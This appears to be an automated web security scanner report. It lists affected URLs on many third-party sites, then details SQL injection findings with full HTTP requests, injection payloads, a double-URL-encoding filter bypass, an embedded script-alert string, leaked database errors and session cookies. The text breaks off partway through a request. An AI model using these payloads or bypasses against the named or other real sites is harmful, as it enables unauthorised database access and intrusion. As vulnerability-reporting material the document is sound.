24.100. http://microsoftcambridge.com/Portals/0/teams/teamlogo_MNOIL.png

24.101. http://microsoftcambridge.com/Portals/0/teams/teamlogo_msftonlineserv.png

24.102. http://microsoftcambridge.com/Portals/0/teams/teams_header.png

24.103. http://microsoftcambridge.com/Portals/0/teams/teamsh2_MNIOL.png

24.104. http://microsoftcambridge.com/Portals/0/teams/teamsh2_msftonlineserv.png

24.105. http://microsoftcambridge.com/Portals/0/teams/tick.png

24.106. http://microsoftcambridge.com/Portals/0/teams/unifiedcom_inline.jpg

24.107. http://microsoftcambridge.com/Portals/0/teams/unifiedcomimg.jpg

24.108. http://microsoftcambridge.com/Portals/0/teams/unifiedcommunications.png

24.109. http://microsoftcambridge.com/favicon.ico

24.110. http://microsoftcambridge.com/images/help.gif

24.111. http://microsoftcambridge.com/images/spacer.gif

24.112. http://microsoftcambridge.com/img/bottom_back.png

24.113. http://microsoftcambridge.com/img/events/about.png

24.114. http://microsoftcambridge.com/img/events/about_ovr.png

24.115. http://microsoftcambridge.com/img/events/community.png

24.116. http://microsoftcambridge.com/img/events/community_ovr.png

24.117. http://microsoftcambridge.com/img/events/contact_us.png

24.118. http://microsoftcambridge.com/img/events/events.png

24.119. http://microsoftcambridge.com/img/events/featured_person.png

24.120. http://microsoftcambridge.com/img/events/header_back.png

24.121. http://microsoftcambridge.com/img/events/latest_feeds.png

24.122. http://microsoftcambridge.com/img/events/latest_tweet.png

24.123. http://microsoftcambridge.com/img/events/people.png

24.124. http://microsoftcambridge.com/img/events/people_ovr.png

24.125. http://microsoftcambridge.com/img/events/search.png

24.126. http://microsoftcambridge.com/img/events/share.png

24.127. http://microsoftcambridge.com/img/events/subscribe.png

24.128. http://microsoftcambridge.com/img/events/teams.png

24.129. http://microsoftcambridge.com/img/events/teams_ovr.png

24.130. http://microsoftcambridge.com/img/events/working.png

24.131. http://microsoftcambridge.com/img/events/working_ovr.png

24.132. http://microsoftcambridge.com/img/header_back.png

24.133. http://microsoftcambridge.com/img/home/about.png

24.134. http://microsoftcambridge.com/img/home/about_ovr.png

24.135. http://microsoftcambridge.com/img/home/community.png

24.136. http://microsoftcambridge.com/img/home/community_ovr.png

24.137. http://microsoftcambridge.com/img/home/contact_us.png

24.138. http://microsoftcambridge.com/img/home/events.png

24.139. http://microsoftcambridge.com/img/home/events_ovr.png

24.140. http://microsoftcambridge.com/img/home/footer_gallery.png

24.141. http://microsoftcambridge.com/img/home/latest_feeds.png

24.142. http://microsoftcambridge.com/img/home/latest_tweet.png

24.143. http://microsoftcambridge.com/img/home/people.png

24.144. http://microsoftcambridge.com/img/home/people_ovr.png

24.145. http://microsoftcambridge.com/img/home/search.png

24.146. http://microsoftcambridge.com/img/home/share.png

24.147. http://microsoftcambridge.com/img/home/subscribe.png

24.148. http://microsoftcambridge.com/img/home/teams.png

24.149. http://microsoftcambridge.com/img/home/teams_ovr.png

24.150. http://microsoftcambridge.com/img/home/working.png

24.151. http://microsoftcambridge.com/img/home/working_ovr.png

24.152. http://microsoftcambridge.com/img/microsoft-new-england-rdc.png

24.153. http://microsoftcambridge.com/img/microsoft_events_bg.jpg

24.154. http://microsoftcambridge.com/img/microsoft_home_bg.jpg

24.155. http://microsoftcambridge.com/img/microsoft_people_bg.jpg

24.156. http://microsoftcambridge.com/img/microsoft_teams_bg.jpg

24.157. http://microsoftcambridge.com/img/people/about.png

24.158. http://microsoftcambridge.com/img/people/about_ovr.png

24.159. http://microsoftcambridge.com/img/people/community.png

24.160. http://microsoftcambridge.com/img/people/community_ovr.png

24.161. http://microsoftcambridge.com/img/people/contact_us.png

24.162. http://microsoftcambridge.com/img/people/events.png

24.163. http://microsoftcambridge.com/img/people/events_ovr.png

24.164. http://microsoftcambridge.com/img/people/featured_team.png

24.165. http://microsoftcambridge.com/img/people/header_back.png

24.166. http://microsoftcambridge.com/img/people/latest_feeds.png

24.167. http://microsoftcambridge.com/img/people/latest_tweet.png

24.168. http://microsoftcambridge.com/img/people/people.png

24.169. http://microsoftcambridge.com/img/people/search.png

24.170. http://microsoftcambridge.com/img/people/share.png

24.171. http://microsoftcambridge.com/img/people/subscribe.png

24.172. http://microsoftcambridge.com/img/people/teams.png

24.173. http://microsoftcambridge.com/img/people/teams_ovr.png

24.174. http://microsoftcambridge.com/img/people/working.png

24.175. http://microsoftcambridge.com/img/people/working_ovr.png

24.176. http://microsoftcambridge.com/img/teams/about.png

24.177. http://microsoftcambridge.com/img/teams/about_ovr.png

24.178. http://microsoftcambridge.com/img/teams/community.png

24.179. http://microsoftcambridge.com/img/teams/community_ovr.png

24.180. http://microsoftcambridge.com/img/teams/contact_us.png

24.181. http://microsoftcambridge.com/img/teams/contentpane_back.png

24.182. http://microsoftcambridge.com/img/teams/events.png

24.183. http://microsoftcambridge.com/img/teams/events_ovr.png

24.184. http://microsoftcambridge.com/img/teams/featured_person.png

24.185. http://microsoftcambridge.com/img/teams/headerpane_back.png

24.186. http://microsoftcambridge.com/img/teams/latest_feeds.png

24.187. http://microsoftcambridge.com/img/teams/latest_tweet.png

24.188. http://microsoftcambridge.com/img/teams/people.png

24.189. http://microsoftcambridge.com/img/teams/people_ovr.png

24.190. http://microsoftcambridge.com/img/teams/search.png

24.191. http://microsoftcambridge.com/img/teams/share.png

24.192. http://microsoftcambridge.com/img/teams/subscribe.png

24.193. http://microsoftcambridge.com/img/teams/teams.png

24.194. http://microsoftcambridge.com/img/teams/working.png

24.195. http://microsoftcambridge.com/img/teams/working_ovr.png

24.196. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.197. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/HK9HyX1GgWJ.js

24.198. http://www.facebook.com/extern/login_status.php

24.199. http://www.facebook.com/extern/login_status.php

24.200. http://www.facebook.com/plugins/like.php

24.201. http://www.facebook.com/plugins/like.php

24.202. http://www.facebook.com/plugins/like.php

24.203. http://www.facebook.com/plugins/like.php

24.204. http://www.facebook.com/plugins/like.php

24.205. http://www.facebook.com/plugins/like.php

24.206. http://www.facebook.com/plugins/like.php

24.207. http://www.facebook.com/plugins/like.php

24.208. http://www.facebook.com/plugins/like.php

24.209. http://www.facebook.com/plugins/like.php

24.210. http://www.facebook.com/plugins/like.php

24.211. http://www.hbccards.com/SkinOverPlayStopSeekMuteVol.swf

24.212. http://www.hbccards.com/content_images/image/homepage_pic.jpg

24.213. http://www.hbccards.com/favicon.ico

24.214. http://www.hbccards.com/flash/sifr.swf

24.215. http://www.hbccards.com/flash_banner/player_V4.swf

24.216. http://www.hbccards.com/images/background.jpg

24.217. http://www.hbccards.com/images/box_bg1.jpg

24.218. http://www.hbccards.com/images/box_bg2.jpg

24.219. http://www.hbccards.com/images/box_bg3.jpg

24.220. http://www.hbccards.com/images/button_bg.jpg

24.221. http://www.hbccards.com/images/footer_bg.jpg

24.222. http://www.hbccards.com/images/hbc_logo.jpg

24.223. http://www.hbccards.com/images/icon_events.jpg

24.224. http://www.hbccards.com/images/icon_live_chat.jpg

24.225. http://www.hbccards.com/images/icon_newsletter.jpg

24.226. http://www.hbccards.com/images/nav_contact.jpg

24.227. http://www.hbccards.com/images/nav_contact_on.jpg

24.228. http://www.hbccards.com/images/nav_gc.jpg

24.229. http://www.hbccards.com/images/nav_gc_on.jpg

24.230. http://www.hbccards.com/images/nav_learnmore.jpg

24.231. http://www.hbccards.com/images/nav_learnmore_on.jpg

24.232. http://www.hbccards.com/images/nav_left_inside_bg.jpg

24.233. http://www.hbccards.com/images/nav_usegc.jpg

24.234. http://www.hbccards.com/images/nav_usegc_on.jpg

24.235. http://www.hbccards.com/images/nav_whyhbc.jpg

24.236. http://www.hbccards.com/images/nav_whyhbc_on.jpg

24.237. http://www.hbccards.com/images/poweredby.jpg

24.238. http://www.hbccards.com/images/sec_nav_bg.jpg

24.239. http://www.hbccards.com/images/spacer.jpg

24.240. http://www.hbccards.com/images/spacer2.jpg

25. Social security numbers disclosed

25.1. http://www.hbccards.com/

25.2. http://www.hbccards.com/ordernow.asp

26. Robots.txt file

26.1. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

26.2. http://api.search.live.net/json.aspx

26.3. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

26.4. http://atgincorporated.com/atgmenu_11.gif

26.5. http://b.scorecardresearch.com/r

26.6. http://clients1.google.com/complete/search

26.7. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255

26.8. http://googleads.g.doubleclick.net/pagead/ads

26.9. http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Dom_Ent/HuckinsYacht-Sound-Rect-300x250/huckins_0311.swf/1299012270

26.10. http://music.aol.com/_uac/adpage.html

26.11. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s83462371905334

26.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1161054613/Top/Dom_Ent/Google-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/72634857383031356952384144615a52

26.13. http://pagead2.googlesyndication.com/pagead/imgad

26.14. http://pixel.quantserve.com/pixel

26.15. http://portal.smartertools.com/ST.ashx

26.16. http://s0.2mdn.net/2450389/Capella_DR_standard_Online_Learn_728x90.swf

26.17. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_

26.18. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.19. https://secure.shareit.com/favicon.ico

26.20. http://segment-pixel.invitemedia.com/pixel

26.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.22. http://toolbarqueries.clients.google.com/tbproxy/af/query

26.23. http://tools.google.com/service/update2

26.24. http://www.citysbest.com/media/citysbest-min.css

26.25. http://www.cramerdev.com/weblog/

26.26. https://www.godaddy.com/

26.27. http://www.google-analytics.com/__utm.gif

26.28. http://www.google.com/uds/

26.29. http://www.googleadservices.com/pagead/conversion/1028748950/

26.30. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html%20%20

26.31. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

26.32. http://www.manitu.de/

26.33. http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf

26.34. https://www.plimus.com/jsp/buynow.jsp

26.35. http://www.smartertools.com/

26.36. http://www.soundingsonline.com/archives/'+NSFTW+'

26.37. http://www.sqlite.org/

26.38. https://www.supermedia.com/spportal/spportalFlow.do

26.39. http://www.superpages.com/inc/social/soc.php

26.40. https://www.territoryahead.com/jump.jsp

26.41. http://www.trustlogo.com/trustlogo/javascript/cot.js

27. Cacheable HTTPS response

27.1. https://a12.alphagodaddy.com/

27.2. https://feedback.discoverbing.com/default.aspx

27.3. https://feedback.discoverbing.com/jsinterface.aspx

27.4. https://secure.shareit.com/shareit/checkout.html

27.5. https://www.godaddy.com/gdshop/blank.htm

27.6. https://www.plimus.com/jsp/ajax/buynow_free_email_domain.jsp

27.7. https://www.plimus.com/jsp/buynow.jsp

27.8. https://www.plimus.com/jsp/buynow_analytics.jsp

27.9. https://www.supermedia.com/help

27.10. https://www.supermedia.com/help/direct-mail

27.11. https://www.supermedia.com/help/domains-email

27.12. https://www.supermedia.com/help/local-search-marketing

27.13. https://www.supermedia.com/help/web-site-design

27.14. https://www.supermedia.com/spportal/404.jsp

27.15. https://www2.hbc.com/contactus/contact-us.asp

28. Multiple content types specified

29. HTML does not specify charset

29.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

29.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

29.3. http://ad.doubleclick.net/adi/huffpost.politics/news

29.4. http://atgincorporated.com/atgmenu_11.gif

29.5. http://atgincorporated.com/images/atgmenu_11_hover.gif

29.6. http://atgincorporated.com/images/atgmenu_12_hover.gif

29.7. http://atgincorporated.com/images/atgmenu_13_hover.gif

29.8. http://atgincorporated.com/images/atgmenu_14_hover.gif

29.9. http://atgincorporated.com/images/atgmenu_15_hover.gif

29.10. http://atgincorporated.com/images/atgmenu_17_hover.gif

29.11. http://atgincorporated.com/qmimages/gradient_11.gif

29.12. http://bidder.mathtag.com/iframe/notify

29.13. http://cloudscan.org/VaUcX/welcome.html

29.14. http://cloudscan.org/favicon.ico

29.15. http://cloudscan.org/welcome.html

29.16. http://hbc.com/

29.17. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

29.18. http://image3.pubmatic.com/AdServer/UPug

29.19. http://js.adsonar.com/js/pass.html

29.20. http://music.aol.com/_uac/adpage.html

29.21. http://music.aol.com/proxy/promo/

29.22. http://my-happyfeet.com/images/about2.gif

29.23. http://my-happyfeet.com/images/faq2.gif

29.24. http://my-happyfeet.com/undefined

29.25. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

29.26. http://www.aamraresources.com/

29.27. http://www.bluestarfibres.com/favicon.ico

29.28. http://www.fast-report.com/bitrix/redirect3.php

29.29. https://www.godaddy.com/sso/keepalive.aspx

29.30. http://www.manitu.de/webhosting/header/

29.31. http://www.manitu.de/webhosting/home/

29.32. http://www.manitu.de/webhosting/nav/

29.33. http://www.manitu.de/webhosting/status/

29.34. http://www.manitu.de/webhosting/subnav/

29.35. http://www.my-happyfeet.com/images/about2.gif

29.36. http://www.my-happyfeet.com/images/faq2.gif

29.37. http://www.nutter.com/careers.ph

29.38. http://www.nutter.com/careers.php

29.39. http://www.nutter.com/media/swf/media/industries/media.212.jpg

29.40. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

29.41. http://www.paperg.com/jsfb/embed.php

30. HTML uses unrecognised charset

30.1. http://www.fast-report.com/bitrix/redirect2.php

30.2. http://www.fast-report.com/en/buy/

30.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

30.4. http://www.fast-report.com/en/download/fastreport.net-download.html

30.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

30.6. http://www.fast-report.com/en/products/

30.7. http://www.fast-report.com/en/products/FastReport.Net.html

31. Content type incorrectly stated

31.1. http://a.rad.msn.com/ADSAdClient31.dll

31.2. http://a12.alphagodaddy.com/

31.3. https://a12.alphagodaddy.com/

31.4. http://blogs.technet.com/analyticsid.aspx

31.5. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

31.6. https://feedback.discoverbing.com/jsinterface.aspx

31.7. http://image3.pubmatic.com/AdServer/UPug

31.8. http://maps.slapi0.virtualearth.net/EntityDetails.ashx

31.9. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

31.10. http://microsoftcambridge.com/favicon.ico

31.11. http://microsoftcambridge.com/slideshow/Vertigo.small.xap

31.12. http://o.aolcdn.com/os_merge/

31.13. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

31.14. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

31.15. http://portalblog.aol.com/media/background_new.gif

31.16. http://rad.msn.com/ADSAdClient31.dll

31.17. http://sales.liveperson.net/hcp/html/mTag.js

31.18. http://sc1.maps.live.com/i/bin/20110317.509/action_item_bullet.gif

31.19. http://technet.microsoft.com/clientaccesspolicy.xml

31.20. http://technet.microsoft.com/en-us/library/bb126093(n).aspx

31.21. http://technet.microsoft.com/en-us/library/bb905490(n).aspx

31.22. http://technet.microsoft.com/en-us/library/cc440494(n).aspx

31.23. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

31.24. http://www.aol.com/ajax.jsp

31.25. https://www.godaddy.com/sso/keepalive.aspx

31.26. http://www.huffingtonpost.com/badge/badges_json_v2.php

31.27. http://www.insideup.com/ppc/leadflow/hins00/project.php

31.28. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

31.29. http://www.manitu.de/webhosting/home/images/homepagekosten-verfuegbarkeit.gif

31.30. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

31.31. http://www.paperg.com/jsfb/embed.php

31.32. http://www.trafficland.com/bing/data.cry

32. SSL certificate

32.1. https://secure.avangate.com/

32.2. https://secure.shareit.com/

32.3. https://www.godaddy.com/

32.4. https://www.plimus.com/

32.5. https://www.supermedia.com/

32.6. https://www.territoryahead.com/

32.7. https://www2.hbc.com/



1. SQL injection  next
There are 28 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d1--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 1 697 -->
       
       
       
           
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET",
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d2--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0 697 -->
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET", url, false);
       r
...[SNIP]...

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /shavlik/index.cfm?m=1009'&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f9062&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 20:42:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...

1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xml/jasmin/get/110325-1413%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413%2527%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=
